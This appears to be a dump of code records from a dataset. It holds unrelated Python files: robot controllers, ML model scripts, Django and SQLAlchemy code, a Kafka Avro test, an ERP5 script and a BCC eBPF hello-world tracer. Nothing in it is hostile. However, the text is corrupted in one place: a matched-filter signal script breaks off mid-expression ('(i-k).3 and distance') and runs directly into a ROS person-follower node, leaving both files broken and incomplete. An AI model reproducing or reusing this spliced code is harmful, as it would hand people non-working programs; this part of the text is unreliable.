Ex:\n# from controller import Robot, Motor, DistanceSensor\nfrom controller import Robot\n\nTIME_STEP = 64\nrobot = Robot()\n\nds = []\ndsNames = ['ds_front', 'ds_FL', 'ds_left', 'ds_FR', 'ds_right', 'ds_BR', 'ds_BL', 'ds_back']\n\nfor i in range(8):\n \n ds.append(robot.getDistanceSensor(dsNames[i]))\n ds[i].enable(TIME_STEP)\n \nwheels = []\nwheelsNames = ['left_wheel', 'right_wheel']\n\nfor i in range(2):\n \n wheels.append(robot.getMotor(wheelsNames[i]))\n wheels[i].setPosition(float('inf'))\n wheels[i].setVelocity(0.0)\n \nf_ObstacleCounter = 0\nfl_ObstacleCounter = 0\nfr_ObstacleCounter = 0\nturn_counter = 0\nturnR = True\nmove_counter = 0\nadjust = 0\n\nwhile robot.step(TIME_STEP) != -1:\n \n leftSpeed = 7\n rightSpeed = 7\n \n if adjust > 0:\n adjust -= 1\n leftSpeed = -3.4\n rightSpeed = 3.4\n \n elif f_ObstacleCounter > 0 and turnR:\n f_ObstacleCounter -= 1\n leftSpeed = 5.0\n rightSpeed = -5.0\n turn_counter += 1\n if turn_counter == 10:\n turnR = False\n turn_counter = 0\n \n elif f_ObstacleCounter > 0 and not turnR:\n f_ObstacleCounter -= 1\n leftSpeed = -5.0\n rightSpeed = 5.0\n turn_counter += 1\n if turn_counter == 10:\n turnR = True\n turn_counter = 0 \n\n elif fl_ObstacleCounter > 0:\n fl_ObstacleCounter -= 1\n leftSpeed = 5.0\n rightSpeed = -5.0\n \n elif fr_ObstacleCounter > 0:\n fr_ObstacleCounter -= 1\n leftSpeed = -5.0\n rightSpeed = 5.0\n \n else: # read sensors\n if ds[0].getValue() < 950.0:\n f_ObstacleCounter = 7\n elif ds[1].getValue() < 950.0:\n fl_ObstacleCounter = 7 \n elif ds[3].getValue() < 950.0:\n fr_ObstacleCounter = 7 \n else:\n move_counter += 1\n if move_counter == 50:\n adjust = 4\n move_counter = 0 \n \n wheels[0].setVelocity(leftSpeed)\n wheels[1].setVelocity(rightSpeed)\n \n# Enter here exit cleanup code.\n","sub_path":"controllers/our_controller/our_controller.py","file_name":"our_controller.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"530349620","text":"a = 1\n\n\ndef parent():\n # a = 5 #parent local\n\n def confusion():\n return sum # a\n\n return confusion()\n\n\nprint(parent())\nprint(a)\n\n# priority\n\n# 1 - start with local\n# 2 - parent local\n# 3 - Global\n# 4 - built-in python function\n\n#global\n\ntotal = 0\ndef count():\n global total\n total += 1\n return total\n\ncount()\ncount()\ncount()\nprint(count())","sub_path":"Basics/scope_rules.py","file_name":"scope_rules.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"366756412","text":"# -*- coding: UTF-8 -*-\nimport math\nimport pylab\nimport random\nfrom matplotlib import mlab\nL=100 # Число отчетов сигнала\nvh=[]# массив для входной последовательности сигнала с шумом\nvih=[]# массив для модуля выходной последовательности сигнала с шумом\ns=[]# массив для сигнала\nh=[]# массив для импульсной характеристики согл. 
фильтра\nvhmod=[]# массив для модуля входной последовательности сигнала с шумом\nfor i in range(0,L):\n if random.randint(0, 1)==1:\n s.append(complex(1,0))\n else:\n s.append(complex(-1,0))\nfor i in range(0,L):\n h.append(s[L-1-i].conjugate())\nfor i in range(0,500):\n x=complex(random.normalvariate(0, 0) ,random.normalvariate(0, 0))\n if i < 100 :\n x=x+s[i]\n vh.append(x);\n vhmod.append(abs(x));\nfor i in range(0,500):\n y=complex(0 ,0)\n for k in range(0,L) :\n if ((i-k)>=0 and (i-k).3 and distance !=np.inf:\n #print(distance)\n distance = self.lidar_data_ranges[0]\n self.pub.publish(Twist(linear=Vector3(x=distance)))\n #self.pub.publish(Twist(linear=Vector3(z=distance)))\n self.rate.sleep()\n #print('Stop')\n self.pub.publish(Twist(linear=Vector3(x=0)))\n self.rate.sleep()\n return self.identify_person\n\n def calc_heading(self):\n #Calculate angle between current and goal position Vectors\n self.pub.publish(Twist(angular=Vector3(z=0)))\n self.current_heading = euler_from_quaternion([self.current_position.orientation.x,self.current_position.orientation.y,self.current_position.orientation.z,self.current_position.orientation.w])\n globalCoords = self.neato_to_world()\n vector1 = np.array([math.tan(self.current_heading[2]),1])\n vector2 = np.array([self.strongestX -self.current_position.position.x,self.strongestY-self.current_position.position.y])#np.array([globalCoords[0][0] -self.current_position.position.x,globalCoords[1][0]-self.current_position.position.y])\n print(vector2.shape)\n angle = math.acos((np.dot(vector1,vector2))/(np.sqrt(vector1.dot(vector1))*np.sqrt(vector2.dot(vector2))))\n angle = angle\n \n if self.strongestX >0:\n angle = 1*angle\n print('Minus Pi')\n angle = angle - self.current_heading[2]\n print(\"Angle: \" + str(angle))\n\n return angle\n def neato_to_world(self):\n worldCoords = np.asarray([[-self.strongestX*np.cos(self.current_heading[2])],[-self.strongestX*np.sin(self.current_heading[2])],[0]]) +np.asarray([[self.strongestY*(-np.sin(self.current_heading[2]))],[self.strongestY*np.cos(self.current_heading[2])],[0]])+np.asarray([[self.current_position.position.x],[self.current_position.position.y],[1]])\n print('Heading: '+str(self.current_heading[2]))\n print('World: '+str(worldCoords))\n print('Local:' +str(self.current_position.position.x)+' '+str(self.current_position.position.y))\n return worldCoords\n def run(self):\n rospy.sleep(1)\n while not rospy.is_shutdown():\n self.state = self.state()\n\n\nif __name__ == '__main__':\n personFollower = personFollowerNode()\n personFollower.run()","sub_path":"warmup_project/scripts/person_follower.py","file_name":"person_follower.py","file_ext":"py","file_size_in_byte":7009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"296090556","text":"arv = int(input(\"Sisestage minutite arv: \"))\r\ncount = 0\r\npaarituid = 0\r\nlaike = 0\r\n\r\nwhile paarituid < arv:\r\n if (count % 2) is not 0:\r\n laike += count\r\n paarituid += 1\r\n count += 1\r\n\r\nprint(\"Laikide koguarv on \" + str(laike) + \".\")\r\n","sub_path":"Alused I/Nädal 3/3.4a Laikimine ver. 2.py","file_name":"3.4a Laikimine ver. 
2.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"563292326","text":"# coding: utf-8\nfrom __future__ import unicode_literals\nimport os\nimport json\n\n\nclass MockResponse(object):\n def __init__(self, status, data=b'{}'):\n self.status_code = status\n self.content = data\n self.text = data.decode('utf-8')\n self.headers = {'Content-Type': 'application/vnd.uploadcare+json'}\n\n def json(self):\n \"\"\"Returns the json-encoded content of a response, if any.\"\"\"\n return json.loads(self.text)\n\n\nclass MockListResponse(MockResponse):\n def __init__(self):\n super(MockListResponse, self).__init__(\n 200, b'{'\n b'\"results\": [], \"next\": null, \"previous\": null,'\n b'\"total\": 0, \"per_page\": 1'\n b'}'\n )\n\n\ndef api_response_from_file(filename):\n path_to_tests_dir = os.path.dirname(__file__)\n path_to_file = os.path.join(path_to_tests_dir, 'api_responses', filename)\n\n with open(path_to_file, 'rb') as fp:\n return fp.read()\n","sub_path":"tests/functional/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"335111936","text":"from src.database import metadata\nfrom sqlalchemy import func, text\nfrom sqlalchemy.dialects.mysql import TINYINT, BIGINT\nfrom sqlalchemy import Table, Column, String, Text, TIMESTAMP, DATETIME\n\n\nreviews = Table('reviews', metadata,\n Column('id', BIGINT(20), primary_key=True, autoincrement=True),\n Column('external_id', String(255, collation='utf8mb4_unicode_ci'), unique=True, nullable=False),\n Column('author', String(255, collation='utf8mb4_unicode_ci'), nullable=False, index=True),\n Column('product_name', String(255, collation='utf8mb4_unicode_ci'), nullable=False),\n Column('review',Text(collation='utf8mb4_unicode_ci')),\n Column('rating', TINYINT(3, unsigned=True), nullable=False, index=True),\n Column('location', String(768, collation='utf8mb4_unicode_ci'), nullable=True),\n Column('purchase_date', DATETIME, nullable=True),\n Column('created_at', TIMESTAMP, nullable=False, server_default=func.now()),\n Column('updated_at', TIMESTAMP, nullable=False, server_default=text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), index=True)\n )\n\n\n\n\n","sub_path":"src/database/models/feefo_review.py","file_name":"feefo_review.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"131886661","text":"#! 
/usr/bin/python2.7\n\nimport sys\nprint(sys.version)\nimport sys\nimport pandas\nimport numpy as np\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential, load_model\nfrom keras.layers.core import Dense, Dropout\nfrom keras.optimizers import SGD, Adam\nfrom IPython.core.debugger import Tracer\nfrom keras.layers import Masking, LSTM, TimeDistributed, Bidirectional, Flatten\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau\nfrom sklearn.preprocessing import OneHotEncoder\n\n\n#FORMAT DATA\n#ONE HOT ENCODES A GIVEN COLUMN\ndef onehot(x): return np.array(OneHotEncoder().fit_transform(x.values.reshape(-1,1)).todense())\n\ndef format(data):\n del data['Unnamed: 605']\n mask = data['AgeGroup'] == 'ag1'\n column_name = 'AgeGroup'\n data.loc[mask, column_name] = 0\n mask = data['AgeGroup'] == 'ag2'\n column_name = 'AgeGroup'\n data.loc[mask, column_name] = 1\n mask = data['AgeGroup'] == 'ag3'\n column_name = 'AgeGroup'\n data.loc[mask, column_name] = 2\n mask = data['Gender'] == 'm'\n column_name = 'Gender'\n data.loc[mask, column_name] = 0\n mask = data['Gender'] == 'f'\n column_name = 'Gender'\n data.loc[mask, column_name] = 1\n return data\n\n\n#LOAD LABELS\ntrain_data_i_vectors = pandas.read_csv(\"/storage/tanel/child_age_gender/exp/ivectors_2048/train/export.csv\", sep=\" \")\ntrain_data_i_vectors = format(train_data_i_vectors)\ntrain_labels_age_group = onehot(train_data_i_vectors['AgeGroup'])\n\nval_data_i_vectors = pandas.read_csv(\"/storage/tanel/child_age_gender/exp/ivectors_2048/dev/export.csv\", sep=\" \")\nval_data_i_vectors = format(val_data_i_vectors)\nval_labels_age_group = onehot(val_data_i_vectors['AgeGroup'])\n\ntest_data_i_vectors = pandas.read_csv(\"/storage/tanel/child_age_gender/exp/ivectors_2048/test/export.csv\", sep=\" \")\ntest_data_i_vectors = format(test_data_i_vectors)\ntest_labels_age_group = onehot(test_data_i_vectors['AgeGroup'])\nprint (\"LABELS LOADED\")\n\n\n#LOAD DATA\n\ntrain_data_padded = np.load(\"/storage/hpc_lkpiel/data/fbank_train_data_padded.npy\", encoding=\"bytes\")\nval_data_padded = np.load(\"/storage/hpc_lkpiel/data/fbank_val_data_padded.npy\", encoding=\"bytes\")\ntest_data_padded = np.load(\"/storage/hpc_lkpiel/data/fbank_test_data_padded.npy\", encoding=\"bytes\")\nprint (\"DATA LOADED\")\n\n################################################################################################\n\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.8,\n patience=2, min_lr=0.0001, verbose=1)\n\n\nmodel_6 = Sequential([\n Masking(mask_value=0., input_shape=(1107,20)),\n Bidirectional(LSTM(64, return_sequences=True, dropout=0.3)),\n Bidirectional(LSTM(64)),\n Dense(3, activation='softmax')\n])\n\nprint (\"model_6 BUILT\")\n\nmodel_6.compile(loss='categorical_crossentropy', optimizer=Adam(lr=0.001), metrics=['accuracy'])\nprint (\"model_6 COMPILED\")\n\n\ncheckpoint = ModelCheckpoint(filepath='/models/model_6.hdf5', monitor='val_loss', save_best_only=True)\n\nhistory = model_6.fit(x=train_data_padded,\n y=train_labels_age_group,\n validation_data=(val_data_padded, val_labels_age_group),\n epochs=25,\n verbose=1,\n batch_size=128,\n callbacks=[checkpoint, reduce_lr]\n)\n\nnp.save('../history/history_model_6.npy', history.history)\nmodelHistory = np.load('../history/history_model_6.npy').item()\n\nprint (\"HISTORY: \")\nprint (modelHistory)\nmodel_6.load_weights('/models/model_6.hdf5')\n\nvalResult = model_6.evaluate(val_data_padded, val_labels_age_group)\ntestResult = 
model_6.evaluate(test_data_padded, test_labels_age_group)\n\nfile = open(\"results.txt\",\"a\")\nfile.write(\"\\nmodel_6 VAL: \" + str(valResult) + \" TEST: \" + str(testResult))\nfile.close()\nprint (\"WROTE TO FILE\")\n\n\n########################################","sub_path":"rnn/rnn6.py","file_name":"rnn6.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"233491714","text":"\"\"\".. Ignore pydocstyle D400.\n\n============\nFlow Filters\n============\n\n\"\"\"\nimport django_filters as filters\n\nfrom rest_framework.exceptions import ParseError\n\nfrom .models import Collection, Data, DescriptorSchema, Entity, Process, Relation\n\nNUMBER_LOOKUPS = [\n \"exact\",\n \"in\",\n \"gt\",\n \"gte\",\n \"lt\",\n \"lte\",\n \"isnull\",\n]\nTEXT_LOOKUPS = [\n \"exact\",\n \"iexact\",\n \"contains\",\n \"icontains\",\n \"in\",\n \"startswith\",\n \"istartswith\",\n \"endswith\",\n \"iendswith\",\n \"isnull\",\n]\nDATE_LOOKUPS = [\n \"exact\",\n \"gt\",\n \"gte\",\n \"lt\",\n \"lte\",\n \"year\",\n \"year__gt\",\n \"year__gte\",\n \"year__lt\",\n \"year__lte\",\n \"month\",\n \"month__gt\",\n \"month__gte\",\n \"month__lt\",\n \"month__lte\",\n \"day\",\n \"day__gt\",\n \"day__gte\",\n \"day__lt\",\n \"day__lte\",\n \"isnull\",\n]\nDATETIME_LOOKUPS = DATE_LOOKUPS + [\n \"date\",\n \"time\",\n \"hour\",\n \"hour__gt\",\n \"hour__gte\",\n \"hour__lt\",\n \"hour__lte\",\n \"minute\",\n \"minute__gt\",\n \"minute__gte\",\n \"minute__lt\",\n \"minute__lte\",\n \"second\",\n \"second__gt\",\n \"second__gte\",\n \"second__lt\",\n \"second__lte\",\n]\n\n\nclass CheckQueryParamsMixin:\n \"\"\"Custom query params validation.\"\"\"\n\n def get_always_allowed_arguments(self):\n \"\"\"Get always allowed query arguments.\"\"\"\n return (\n \"fields\",\n \"format\",\n \"limit\",\n \"offset\",\n \"ordering\",\n )\n\n def validate_query_params(self):\n \"\"\"Ensure no unsupported query params were used.\"\"\"\n allowed_params = set(self.get_filters().keys())\n allowed_params.update(self.get_always_allowed_arguments())\n\n unallowed = set(self.request.query_params.keys()) - allowed_params\n\n if unallowed:\n msg = \"Unsupported parameter(s): {}. 
Please use a combination of: {}.\".format(\n \", \".join(unallowed), \", \".join(allowed_params),\n )\n self.form.add_error(field=None, error=ParseError(msg))\n\n def is_valid(self):\n \"\"\"Validate filterset.\"\"\"\n self.validate_query_params()\n return super().is_valid()\n\n\nclass BaseResolweFilter(CheckQueryParamsMixin, filters.FilterSet):\n \"\"\"Base filter for Resolwe's endpoints.\"\"\"\n\n class Meta:\n \"\"\"Filter configuration.\"\"\"\n\n fields = {\n \"id\": NUMBER_LOOKUPS[:],\n \"slug\": TEXT_LOOKUPS[:],\n \"name\": TEXT_LOOKUPS[:],\n \"contributor\": [\"exact\", \"in\"],\n \"created\": DATETIME_LOOKUPS[:],\n \"modified\": DATETIME_LOOKUPS[:],\n }\n\n\nclass DescriptorSchemaFilter(BaseResolweFilter):\n \"\"\"Filter the DescriptorSchema endpoint.\"\"\"\n\n class Meta(BaseResolweFilter.Meta):\n \"\"\"Filter configuration.\"\"\"\n\n model = DescriptorSchema\n\n\nclass CollectionFilter(BaseResolweFilter):\n \"\"\"Filter the Collection endpoint.\"\"\"\n\n data = filters.ModelChoiceFilter(queryset=Data.objects.all())\n entity = filters.ModelChoiceFilter(queryset=Entity.objects.all())\n\n class Meta(BaseResolweFilter.Meta):\n \"\"\"Filter configuration.\"\"\"\n\n model = Collection\n fields = {\n **BaseResolweFilter.Meta.fields,\n **{\"description\": TEXT_LOOKUPS[:], \"descriptor_schema\": [\"exact\"],},\n }\n\n\nclass TagsFilter(filters.filters.BaseCSVFilter, filters.CharFilter):\n \"\"\"Filter for tags.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Construct tags filter.\"\"\"\n kwargs.setdefault(\"lookup_expr\", \"contains\")\n super().__init__(*args, **kwargs)\n\n\nclass EntityFilter(CollectionFilter):\n \"\"\"Filter the Entity endpoint.\"\"\"\n\n collection = filters.ModelChoiceFilter(\n field_name=\"collection\", queryset=Collection.objects.all()\n )\n tags = TagsFilter()\n\n class Meta(CollectionFilter.Meta):\n \"\"\"Filter configuration.\"\"\"\n\n model = Entity\n\n\nclass ProcessFilter(BaseResolweFilter):\n \"\"\"Filter the Process endpoint.\"\"\"\n\n category = filters.CharFilter(field_name=\"category\", lookup_expr=\"startswith\")\n type = filters.CharFilter(field_name=\"type\", lookup_expr=\"startswith\")\n is_active = filters.rest_framework.filters.BooleanFilter(field_name=\"is_active\")\n\n class Meta(BaseResolweFilter.Meta):\n \"\"\"Filter configuration.\"\"\"\n\n model = Process\n fields = {**BaseResolweFilter.Meta.fields, **{\"scheduling_class\": [\"exact\"],}}\n\n\nclass CharInFilter(filters.BaseInFilter, filters.CharFilter):\n \"\"\"Helper class for creation of CharFilter with \"in\" lookup.\"\"\"\n\n\nclass DataFilter(BaseResolweFilter):\n \"\"\"Filter the Data endpoint.\"\"\"\n\n collection = filters.ModelChoiceFilter(queryset=Collection.objects.all())\n collection__slug = filters.CharFilter(\n field_name=\"collection__slug\", lookup_expr=\"exact\"\n )\n\n entity = filters.ModelChoiceFilter(queryset=Entity.objects.all())\n\n type = filters.CharFilter(field_name=\"process__type\", lookup_expr=\"startswith\")\n status = filters.CharFilter(lookup_expr=\"iexact\")\n status__in = CharInFilter(field_name=\"status\", lookup_expr=\"in\")\n\n tags = TagsFilter()\n\n class Meta(BaseResolweFilter.Meta):\n \"\"\"Filter configuration.\"\"\"\n\n model = Data\n fields = {\n **BaseResolweFilter.Meta.fields,\n **{\n \"process\": [\"exact\"],\n \"process__slug\": [\"exact\"],\n \"finished\": DATETIME_LOOKUPS[:],\n \"started\": DATETIME_LOOKUPS[:],\n },\n }\n\n\nclass RelationFilter(BaseResolweFilter):\n \"\"\"Filter the Relation endpoint.\"\"\"\n\n category = 
filters.CharFilter(lookup_expr=\"iexact\")\n collection = filters.ModelChoiceFilter(queryset=Collection.objects.all())\n type = filters.CharFilter(field_name=\"type__name\")\n\n class Meta(BaseResolweFilter.Meta):\n \"\"\"Filter configuration.\"\"\"\n\n model = Relation\n fields = BaseResolweFilter.Meta.fields\n\n def get_always_allowed_arguments(self):\n \"\"\"Get always allowed query arguments.\"\"\"\n return super().get_always_allowed_arguments() + (\"entity\", \"label\", \"position\",)\n","sub_path":"resolwe/flow/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"139739265","text":"import sys\n\nfrom confluent_kafka import avro\nfrom confluent_kafka import KafkaError\n\nfrom confluent_kafka.avro import AvroProducer\nfrom confluent_kafka.avro import AvroConsumer\nfrom confluent_kafka.avro.serializer import SerializerError\n\n\nVALUE_SCHEMA_STR = \"\"\"\n{\n \"namespace\": \"Yggdrasil\",\n\t\"name\": \"Poem\",\n\t\"type\": \"record\",\n\t\"fields\": [\n\t\t{\"name\": \"name\", \"type\": \"string\"},\n\t\t{\"name\": \"text\", \"type\": \"string\"}\n\t]\n}\n\"\"\"\nVALUE_SCHEMA = avro.loads(VALUE_SCHEMA_STR)\n\nTEST_MESSAGES = [\n {\"name\": \"Völuspá\", \"text\": \"An ash I know there stands, Yggdrasill is its name, a tall tree, showered with shining loam. From there come the dews that drop in the valleys. It stands forever green over Urðr's well.\"},\n {\"name\": \"Hávamál\", \"text\": \"I know that I hung on a windy tree nine long nights, wounded with a spear, dedicated to Odin, myself to myself, on that tree of which no man knows from where its roots run\"},\n]\n\n\ndef produce_test_messages(broker, schema_registry, schema, topic):\n producer = AvroProducer(\n {\n 'bootstrap.servers': broker,\n 'schema.registry.url': schema_registry\n },\n default_value_schema=schema\n )\n\n for message in TEST_MESSAGES:\n producer.produce(topic=topic, value=message)\n print('Produced [%s]' % message)\n producer.flush()\n\n\ndef consume_test_messages(broker, schema_registry, topic):\n consumer = AvroConsumer({\n 'bootstrap.servers': broker,\n 'group.id': 'groupid',\n 'schema.registry.url': schema_registry,\n 'auto.offset.reset': 'earliest'\n })\n\n consumer.subscribe([topic])\n\n count = 0\n while True:\n try:\n msg = consumer.poll(1)\n\n except SerializerError as e:\n print(\"Message deserialization failed for {}: {}\".format(msg, e))\n break\n\n if msg is None:\n count += 1\n if count == 10:\n break\n continue\n\n if msg.error():\n print(\"AvroConsumer error: {}\".format(msg.error()))\n continue\n\n print('Consumed', msg.value())\n\n consumer.close()\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) < 4:\n print(\"Usage: python3 producer.py \")\n exit(1)\n\n BROKER_HOST = sys.argv[1]\n SCHEMA_REGISTRY = sys.argv[2]\n TOPIC = sys.argv[3]\n\n produce_test_messages(BROKER_HOST, SCHEMA_REGISTRY, VALUE_SCHEMA, TOPIC)\n consume_test_messages(BROKER_HOST, SCHEMA_REGISTRY, TOPIC)\n","sub_path":"niu_heimar/test_yggdrasil.py","file_name":"test_yggdrasil.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"274737675","text":"import architecture\nimport tensorflow as tf\nimport Architectures.Layers.guidedfilter_color_trainable as gct\n\nclass MscnnGuidedColorTreinable(architecture.Architecture):\n def __init__(self):\n parameters_list = ['input_size', 'summary_writing_period',\n 
\"validation_period\", \"model_saving_period\"]\n\n self.config_dict = self.open_config(parameters_list)\n self.input_size = self.config_dict[\"input_size\"][0:2]\n\n def prediction(self, sample, training=False):\n \" Coarse-scale Network\"\n normalizer_params = {'is_training':training, 'center':True,\n 'updates_collections':None, 'scale':True}\n conv1 = tf.contrib.layers.conv2d(inputs=sample, num_outputs=5, kernel_size=[11, 11],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n\n pool1 = tf.contrib.layers.max_pool2d(inputs=conv1, kernel_size=[2, 2], stride=2,\n padding='VALID') #pooling\n\n upsamp1 = tf.image.resize_nearest_neighbor(pool1, self.input_size) # upsampling\n\n\n conv2 = tf.contrib.layers.conv2d(inputs=upsamp1, num_outputs=5, kernel_size=[9, 9],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n\n pool2 = tf.contrib.layers.max_pool2d(inputs=conv2, kernel_size=[2, 2], stride=2,\n padding='VALID') #pooling\n\n upsamp2 = tf.image.resize_nearest_neighbor(pool2, self.input_size) # upsampling\n\n conv3 = tf.contrib.layers.conv2d(inputs=upsamp2, num_outputs=10, kernel_size=[7, 7],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n\n pool3 = tf.contrib.layers.max_pool2d(inputs=conv3, kernel_size=[2, 2], stride=2,\n padding='VALID') #pooling\n\n upsamp3 = tf.image.resize_nearest_neighbor(pool3, self.input_size) # upsampling\n\n linear_combination = tf.contrib.layers.conv2d(inputs=upsamp3, num_outputs=1,\n kernel_size=[1, 1],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.sigmoid)\n\n \"\"\"Fine-scale Network\"\"\"\n\n conv4 = tf.contrib.layers.conv2d(inputs=sample, num_outputs=4, kernel_size=[7, 7],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n\n pool4 = tf.contrib.layers.max_pool2d(inputs=conv4, kernel_size=[2, 2], stride=2,\n padding='VALID') #pooling e upsampling\n\n upsamp4 = tf.image.resize_nearest_neighbor(pool4, self.input_size) # upsampling\n\n concatenation = tf.concat([upsamp4, linear_combination], 3)\n\n conv5 = tf.contrib.layers.conv2d(inputs=concatenation, num_outputs=5, kernel_size=[5, 5],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n\n pool5 = tf.contrib.layers.max_pool2d(inputs=conv5, kernel_size=[2, 2], stride=2,\n padding='VALID') #pooling e upsampling\n\n upsamp5 = tf.image.resize_nearest_neighbor(pool5, self.input_size) # upsampling\n\n conv6 = tf.contrib.layers.conv2d(inputs=upsamp5, num_outputs=10, kernel_size=[3, 3],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n\n pool6 = tf.contrib.layers.max_pool2d(inputs=conv6, kernel_size=[2, 2], stride=2,\n padding='VALID') # pooling e upsampling\n\n upsamp6 = tf.image.resize_nearest_neighbor(pool6, self.input_size) # upsampling\n\n linear_combination2 = tf.contrib.layers.conv2d(inputs=upsamp6, num_outputs=1,\n kernel_size=[1, 1], stride=[1, 1],\n padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n 
normalizer_params=normalizer_params,\n activation_fn=tf.nn.sigmoid)\n\n guided_trans = gct.guidedfilter_color_treinable(sample, linear_combination2, r=20, eps=10**-6)\n tf.summary.image(\"architecture_output\", guided_trans)\n return guided_trans\n\n\n\n def get_validation_period(self):\n return self.config_dict[\"validation_period\"]\n\n def get_model_saving_period(self):\n return self.config_dict[\"model_saving_period\"]\n\n def get_summary_writing_period(self):\n return self.config_dict[\"summary_writing_period\"]\n","sub_path":"Architectures/ProjectDeepdive/mscnn/mscnn_guided_color_treinable.py","file_name":"mscnn_guided_color_treinable.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"564479476","text":"\"\"\"Returns an item list of the acceptable bank accounts.\nIf `organisation` is passed, then we only show bank accounts available for that\norganisation, using the following policy:\n - if organisation is independant accounting entity (ie. have accounting periods),\n only bank accounts from this organisation can be selected\n - otherwise, bank accounts from this organisation and all organisation directly\n members of the parent groups can be us\n - if organisation higher in the group hierarchy contains bank accounts, bank\n accounts from parent organisations can be selected\n\nIf organisation is not passed, this script will return all bank accounts\napplicable for section_category and section_category_strict_membership.\n\"\"\"\nportal = context.getPortalObject()\n\nsearch_kw = dict(portal_type=portal.getPortalPaymentNodeTypeList())\nif skip_invalidated_bank_accounts:\n search_kw['validation_state'] = '!=invalidated'\n\nif organisation:\n organisation_value = portal.restrictedTraverse(organisation)\n\n # if organisation is an independant accounting section and contains bank accounts,\n # only take into account those.\n if organisation_value == organisation_value.Organisation_getMappingRelatedOrganisation():\n bank_account_list = organisation_value.searchFolder(**search_kw)\n # else we lookup in organisations from parent groups.\n else:\n group_value = organisation_value.getGroupValue(None)\n if group_value is not None:\n uid_list = []\n while group_value.getPortalType() != 'Base Category':\n uid_list.append(group_value.getUid())\n group_value = group_value.getParentValue()\n search_kw['strict_parent_group_uid'] = uid_list\n search_kw['parent_portal_type'] = 'Organisation'\n bank_account_list = portal.portal_catalog(**search_kw)\n\nelse:\n if section_category is None:\n section_category = portal.portal_preferences\\\n .getPreferredAccountingTransactionSectionCategory()\n section_uid = portal.Base_getSectionUidListForSectionCategory(\n section_category=section_category,\n strict_membership=section_category_strict_membership)\n search_kw['parent_uid'] = section_uid\n bank_account_list = portal.portal_catalog(**search_kw)\n\n\nitem_list = [('', '')]\n\n\n# If we have bank accounts from more than one organisation, include\n# the organisation as hierarchy to show which organisation the bank\n# account belongs to.\ninclude_organisation_hierarchy = len(set(\n ['/'.join(b.path.split('/')[:-1]) for b in bank_account_list])) > 1\n\nprevious_organisation = None\n# sort bank accounts in a way that bank accounts from the same\n# organisation are consecutive\nfor brain in sorted(bank_account_list, key=lambda b:b.path):\n bank = brain.getObject()\n if include_organisation_hierarchy:\n organisation = 
bank.getParentValue()\n if organisation != previous_organisation:\n previous_organisation = organisation\n # include non-selectable element to show hierarchy\n item_list.append((organisation.getTranslatedTitle(), None))\n\n if bank.getReference() and bank.getTitle() \\\n and bank.getReference() != bank.getTitle():\n item_list.append(('%s - %s' % ( bank.getReference(),\n bank.getTitle() or\n bank.getSourceFreeText() or\n bank.getSourceTitle()),\n bank.getRelativeUrl()))\n else:\n item_list.append(( bank.getReference() or\n bank.getTitle() or\n bank.getSourceFreeText() or\n bank.getSourceTitle(),\n bank.getRelativeUrl() ))\n\nreturn item_list\n","sub_path":"bt5/erp5_accounting/SkinTemplateItem/portal_skins/erp5_accounting/AccountModule_getBankAccountItemList.py","file_name":"AccountModule_getBankAccountItemList.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"275407964","text":"#!/usr/bin/env python3\n\nfrom bcc import BPF\n\nBPF_PROGRAM = r\"\"\"\nint hello(void *ctx) {\n bpf_trace_printk(\"Hello world! File opened\\n\");\n return 0;\n}\n\"\"\"\n\n\ndef main():\n bpf = BPF(text=BPF_PROGRAM)\n bpf.attach_kprobe(event=bpf.get_syscall_fnname(\"clone\"), fn_name=\"hello\")\n\n while True:\n try:\n (_, _, _, _, _, msg_b) = bpf.trace_fields()\n msg = 